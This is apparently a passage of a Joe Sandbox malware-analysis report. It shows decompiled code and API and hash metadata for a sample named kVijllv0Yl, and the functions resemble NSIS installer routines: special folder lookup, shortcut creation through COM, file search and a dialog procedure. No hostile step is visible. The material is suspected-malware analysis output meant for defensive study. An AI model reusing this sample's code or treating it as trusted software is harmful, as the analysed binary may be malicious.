                  0x00405c3b
                  0x00405bc6
                  0x00000000
                  0x00405b84
                  0x00405b89
                  0x00405b9f
                  0x00405ba4
                  0x00405ba7
                  0x00405c44
                  0x00405c44
                  0x00405c48
                  0x00405c50
                  0x00405c50
                  0x00000000
                  0x00405c48
                  0x00405bb1
                  0x00405c3f
                  0x00405c3f
                  0x00405c42
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405c42
                  0x00405b82
                  0x00405b55
                  0x00405b59
                  0x00000000
                  0x00000000
                  0x00405b5b
                  0x00405b5f
                  0x00000000
                  0x00000000
                  0x00405b61
                  0x00405b65
                  0x00000000
                  0x00405b67
                  0x00405b67
                  0x00000000
                  0x00405b67
                  0x00405b65
                  0x00405cca
                  0x00405cd4
                  0x00405ce0
                  0x00405ce0
                  0x00000000

                  APIs
                  • GetVersion.KERNEL32(?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
                  • GetSystemDirectoryA.KERNEL32 ref: 00405BC6
                  • GetWindowsDirectoryA.KERNEL32(mcchdhqnu,00000400), ref: 00405BD9
                  • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
                  • SHGetPathFromIDListA.SHELL32(00000000,mcchdhqnu), ref: 00405C23
                  • CoTaskMemFree.OLE32(00000000), ref: 00405C2E
                  • lstrcatA.KERNEL32(mcchdhqnu,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
                  • lstrlenA.KERNEL32(mcchdhqnu,?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$mcchdhqnu
                  • API String ID: 900638850-2276404844
                  • Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                  • Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
                  • Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                  • Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402012 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                  Download Yara Rule
                  C-Code - Quality: 74%
                  			E00402012() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
				_t96 = E004029E8(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
				if(E004055E5(_t96) == 0) {
					E004029E8(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\engineer\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                  0x0040201b
                  0x00402025
                  0x0040202e
                  0x00402038
                  0x00402041
                  0x0040204b
                  0x0040204f
                  0x0040204f
                  0x00402054
                  0x00402065
                  0x0040206d
                  0x0040214d
                  0x0040214d
                  0x00402154
                  0x00402073
                  0x00402073
                  0x00402084
                  0x00402088
                  0x0040208e
                  0x00402098
                  0x0040209a
                  0x004020a5
                  0x004020a8
                  0x004020b5
                  0x004020b7
                  0x004020b9
                  0x004020c0
                  0x004020c3
                  0x004020c3
                  0x004020c6
                  0x004020d0
                  0x004020d8
                  0x004020dd
                  0x004020e9
                  0x004020e9
                  0x004020ec
                  0x004020f5
                  0x004020f8
                  0x00402101
                  0x00402106
                  0x00402118
                  0x00402127
                  0x00402129
                  0x00402135
                  0x00402135
                  0x00402127
                  0x00402137
                  0x0040213d
                  0x0040213d
                  0x00402140
                  0x00402146
                  0x0040214b
                  0x00402160
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040214b
                  0x00402156
                  0x00402880
                  0x0040288c

                  APIs
                  • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                  Strings
                  • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID: C:\Users\user\AppData\Local\Temp
                  • API String ID: 123533781-1104044542
                  • Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                  • Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
                  • Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                  • Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402630 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 39%
                  			E00402630(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
					E004059E3(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405A85();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                  0x00402648
                  0x0040265c
                  0x00402667
                  0x00402668
                  0x004027a3
                  0x0040264a
                  0x0040264a
                  0x0040264c
                  0x0040264e
                  0x0040264e
                  0x00402880
                  0x0040288c

                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: FileFindFirst
                  • String ID:
                  • API String ID: 1974802433-0
                  • Opcode ID: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                  • Instruction ID: 76eef0906e3fa6c86cf2ebea0eb1ad5f879b60bc34498b8afccad509cb3c3919
                  • Opcode Fuzzy Hash: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                  • Instruction Fuzzy Hash: 67F0A772A04100EED700EBB59D49EFE7778DF11324F6005BBE111B20C1C7B889419A2A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 021B0A17 Relevance: .3, Instructions: 261COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.352276788.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_21b0000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1e7e407e09b3ae2660778d9abb1b795b07927266fa4f49a3615fe5ddf840f3e4
                  • Instruction ID: c6cd482c69254f0a681dd94e419880874dba8e4cdc656bece87de20c7db1629b
                  • Opcode Fuzzy Hash: 1e7e407e09b3ae2660778d9abb1b795b07927266fa4f49a3615fe5ddf840f3e4
                  • Instruction Fuzzy Hash: A3C1025485D2EDADCB06CBF945643FCBFB05D2A102F0845CAE0E5E6283C53A938EDB25
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 021B0616 Relevance: .1, Instructions: 61COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.352276788.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_21b0000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                  • Instruction ID: 33d2fd9814837d8cd2b2c03e27cbd272719fd33588f5f17da85d801f9f899b76
                  • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                  • Instruction Fuzzy Hash: 1411A371A10118AFCB209BB9C8888EFF7FDEF897947554065F805D3214E7709E40C6A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 021B0706 Relevance: .0, Instructions: 26COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.352276788.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_21b0000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                  • Instruction ID: 0fa9000e8d4e2780e05f00a01601986a4e9dd99ba9b6803d9e52d97c56d61e3b
                  • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                  • Instruction Fuzzy Hash: DAE012357A45459FC755CBA8C981D96B3F4EF1D360B154294F815C77A0EB34ED00DA50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 021B0744 Relevance: .0, Instructions: 23COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.352276788.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_21b0000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                  • Instruction ID: cf8d8071297b3f96b685957c5c8f0e24ccbdf9bc220dd92ea513e8ef84e4df46
                  • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                  • Instruction Fuzzy Hash: F4E04F363505508FC3229A19D980993F3F9EF8C2B07154469E89AD3A11C320FC00CA90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 021B06C7 Relevance: .0, Instructions: 7COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.352276788.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_21b0000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                  • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                  • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                  • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403964 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42047c = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
						 *0x420490 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f458 = _t91;
						E00403E37(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42047c = 1;
					}
					_t122 =  *0x4091bc; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403E83(0x40b);
						while(1) {
							_t37 =  *0x42047c;
							 *0x4091bc =  *0x4091bc + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091bc; // 0xffffffff
							__eflags = _t39 -  *0x423ec4;
							if(_t39 ==  *0x423ec4) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133;
							if( *0x42366c != _t133) {
								break;
							}
							__eflags =  *0x4091bc -  *0x423ec4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E37(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133;
							_v32 = _t49;
							if( *0x423f2c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E59(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f458, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133;
							if( *0x423f2c == _t133) {
								_push( *0x420490);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f458);
							}
							E00403E6C();
							E00405A85(0x420498, 0x4236a0);
							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420498);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc68 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E37(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133;
									if( *0x42366c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403E83(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133;
								if( *0x423f2c != _t133) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133;
								if( *0x423f20 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678);
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f860);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c;
						return 0 |  *0x42366c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403E9E(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t133;
										if( *0x423f2c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f860 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E10();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f860 = _t127;
										goto L21;
									}
									__eflags =  *0x4091bc - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						if( *0x421498 == _t133 &&  *0x423678 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x421498 = 1;
						}
						L61:
						return 0;
					}
				}
			}






























                  0x0040396d
                  0x00403976
                  0x00403ab7
                  0x00403abb
                  0x00403abf
                  0x00403ac1
                  0x00403ac6
                  0x00403ad1
                  0x00403adc
                  0x00403ae1
                  0x00403ae3
                  0x00403ae5
                  0x00403ae8
                  0x00403aed
                  0x00403afb
                  0x00403b08
                  0x00403b0f
                  0x00403b0f
                  0x00403b10
                  0x00403b10
                  0x00403b15
                  0x00403b1b
                  0x00403b22
                  0x00403b28
                  0x00403b2a
                  0x00403b6a
                  0x00403b6f
                  0x00403b74
                  0x00403b74
                  0x00403b79
                  0x00403b82
                  0x00403b84
                  0x00403b89
                  0x00403b8f
                  0x00403b93
                  0x00403b93
                  0x00403b98
                  0x00403b9e
                  0x00000000
                  0x00000000
                  0x00403ba9
                  0x00403baf
                  0x00000000
                  0x00000000
                  0x00403bb8
                  0x00403bc0
                  0x00403bc5
                  0x00403bc8
                  0x00403bce
                  0x00403bd3
                  0x00403bd6
                  0x00403bdc
                  0x00403be1
                  0x00403be4
                  0x00403bea
                  0x00403bf2
                  0x00403bf8
                  0x00403bfe
                  0x00403c02
                  0x00403c09
                  0x00403c09
                  0x00403c09
                  0x00403c13
                  0x00403c25
                  0x00403c31
                  0x00403c36
                  0x00403c40
                  0x00403c46
                  0x00403c48
                  0x00403c4d
                  0x00403c4a
                  0x00403c4a
                  0x00403c4a
                  0x00403c5d
                  0x00403c75
                  0x00403c77
                  0x00403c7d
                  0x00403c92
                  0x00403c7f
                  0x00403c88
                  0x00403c8a
                  0x00403c8a
                  0x00403c98
                  0x00403ca8
                  0x00403cb9
                  0x00403cc0
                  0x00403cc6
                  0x00403cca
                  0x00403ccf
                  0x00403cd1
                  0x00000000
                  0x00403cd7
                  0x00403cd7
                  0x00403cd9
                  0x00000000
                  0x00000000
                  0x00403cdf
                  0x00403ce3
                  0x00403d08
                  0x00403d0e
                  0x00403d14
                  0x00403d16
                  0x00000000
                  0x00000000
                  0x00403d3c
                  0x00403d42
                  0x00403d44
                  0x00403d49
                  0x00000000
                  0x00000000
                  0x00403d4f
                  0x00403d52
                  0x00403d55
                  0x00403d6c
                  0x00403d78
                  0x00403d91
                  0x00403d97
                  0x00403d9b
                  0x00403da0
                  0x00403da6
                  0x00000000
                  0x00000000
                  0x00403db0
                  0x00403dbb
                  0x00000000
                  0x00403dbb
                  0x00403ce5
                  0x00403ceb
                  0x00000000
                  0x00000000
                  0x00403cf1
                  0x00403cf7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403cfd
                  0x00403cd1
                  0x00403dc8
                  0x00403dd4
                  0x00403ddb
                  0x00000000
                  0x00403b2c
                  0x00403b2c
                  0x00403b2f
                  0x00403b62
                  0x00403b62
                  0x00403b64
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403b64
                  0x00403b31
                  0x00403b35
                  0x00403b3a
                  0x00403b3c
                  0x00000000
                  0x00000000
                  0x00403b4c
                  0x00403b54
                  0x00000000
                  0x00403b5a
                  0x00403988
                  0x00403988
                  0x0040398c
                  0x00403991
                  0x004039a0
                  0x004039a0
                  0x004039a9
                  0x004039b2
                  0x004039bd
                  0x004039bd
                  0x004039c9
                  0x004039e5
                  0x004039e8
                  0x004039fb
                  0x00403a01
                  0x00403aa4
                  0x00000000
                  0x00403aad
                  0x00403a07
                  0x00403a14
                  0x00403a16
                  0x00403a18
                  0x00403a37
                  0x00403a37
                  0x00403a3a
                  0x00403a3f
                  0x00403a42
                  0x00403a52
                  0x00403a53
                  0x00403a55
                  0x00403a8b
                  0x00403a9e
                  0x00000000
                  0x00403a9e
                  0x00403a57
                  0x00403a5d
                  0x00403a76
                  0x00403a7b
                  0x00403a7d
                  0x00000000
                  0x00000000
                  0x00403a7f
                  0x00403a6b
                  0x00403a6b
                  0x00403a6d
                  0x00403a6d
                  0x00000000
                  0x00403a6d
                  0x00403a60
                  0x00403a65
                  0x00000000
                  0x00403a65
                  0x00403a44
                  0x00403a4a
                  0x00000000
                  0x00000000
                  0x00403a4c
                  0x00000000
                  0x00403a4c
                  0x00403a3c
                  0x00000000
                  0x00403a3c
                  0x00403a22
                  0x00403a29
                  0x00403a2f
                  0x00403a31
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403a31
                  0x004039ed
                  0x00000000
                  0x004039cb
                  0x004039d1
                  0x004039db
                  0x00403de1
                  0x00403de7
                  0x00403df4
                  0x00403dfa
                  0x00403dfa
                  0x00403e04
                  0x00000000
                  0x00403e04
                  0x004039c9

                  APIs
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
                  • ShowWindow.USER32(?), ref: 004039BD
                  • DestroyWindow.USER32 ref: 004039D1
                  • SetWindowLongA.USER32 ref: 004039ED
                  • GetDlgItem.USER32 ref: 00403A0E
                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A22
                  • IsWindowEnabled.USER32(00000000), ref: 00403A29
                  • GetDlgItem.USER32 ref: 00403AD7
                  • GetDlgItem.USER32 ref: 00403AE1
                  • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AFB
                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B4C
                  • GetDlgItem.USER32 ref: 00403BF2
                  • ShowWindow.USER32(00000000,?), ref: 00403C13
                  • EnableWindow.USER32(?,?), ref: 00403C25
                  • EnableWindow.USER32(?,?), ref: 00403C40
                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C56
